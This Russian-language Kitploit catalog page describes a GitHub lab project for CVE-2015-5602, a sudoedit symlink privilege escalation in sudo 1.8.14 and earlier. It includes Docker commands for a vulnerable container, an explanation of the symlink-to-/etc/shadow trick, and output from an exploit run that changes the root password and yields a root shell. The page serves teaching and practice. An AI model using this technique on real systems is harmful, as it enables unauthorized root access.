Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
privesc-CVE-2015-5602 — Sudo <= 1.8.14: локальное повышение привилегий и уязвимый контейнер | Kitploit
Инструменты/GitHubGitHub/t0kx/privesc-cve-2015-5602
Повышение привилегийБезопасность контейнеровАнализ уязвимостейЭксплуатацияОбучение и ОбразованиеЛаборатории и Практика
GitHubt0kx/privesc-cve-2015-5602

privesc-CVE-2015-5602

Sudo <= 1.8.14: локальное повышение привилегий и уязвимый контейнер

Репозиторий
152238 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Sudo <=1.8.14 Локальное повышение привилегий

Sudo (сокращение от "su do") позволяет системному администратору предоставлять определенным пользователям (или группам пользователей) возможность выполнять некоторые (или все) команды от имени root с записью всех команд и аргументов.

Уязвимая среда

Чтобы настроить уязвимую среду для тестирования, вам понадобится установленный Docker, и просто выполните следующую команду:

root@kitploit:~
docker build -t privesc/cve-2015-5602 .
docker run --rm -it privesc/cve-2015-5602

И он запустит интерактивную оболочку с низкими привилегиями пользователя.

Уязвимый код

Ошибка была найдена в sudoedit, который не проверяет полный путь, если подстановочный символ используется дважды (например, /home/*/*/esc.txt). Это позволяет злоумышленнику заменить реальный файл esc.txt символической ссылкой на другое место (например, /etc/shadow).

Успешная эксплуатация этой уязвимости может позволить злоумышленнику манипулировать файлами и получить привилегии root на хост-системе с помощью symlink-атак.

Эксплойт

Чтобы эксплуатировать эту цель, просто выполните:

root@kitploit:~
./exploit.sh

Если вы используете этот уязвимый образ, вы можете просто выполнить:

root@kitploit:~
user@1cc9cd901b07:~$ sudo -l
User user may run the following commands on 1cc9cd901b07:
    (root) NOPASSWD: sudoedit /home/*/*/esc.txt
user@1cc9cd901b07:~$ ./exploit.sh 
[+] CVE-2015-5602 exploit by t0kx
[+] Creating folder...
[+] Creating symlink
[+] Modify EDITOR...
[+] Change root password to: d03c09dc34c53657aff1f459a86b20ed
[+] Done
user@1cc9cd901b07:~$ su
Password: 
root@1cc9cd901b07:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@1cc9cd901b07:/home/user#

Благодарности

Эта уязвимость была найдена Daniel Svartman.

Отказ от ответственности

Эта и предыдущие программы предназначены ТОЛЬКО для образовательных целей. Не используйте их без разрешения. Применяется стандартное заявление об отказе от ответственности, особенно тот факт, что я (t0kx) не несу ответственности за любой ущерб, причиненный прямым или косвенным использованием информации или функциональности, предоставленных этими программами. Автор или любой интернет-провайдер не несет НИКАКОЙ ответственности за содержание или неправомерное использование этих программ или любых их производных. Используя эти программы, вы принимаете тот факт, что любой ущерб (потеря данных, сбой системы, компрометация системы и т.д.), вызванный использованием этих программ, не является ответственностью t0kx.

Скачать инструмент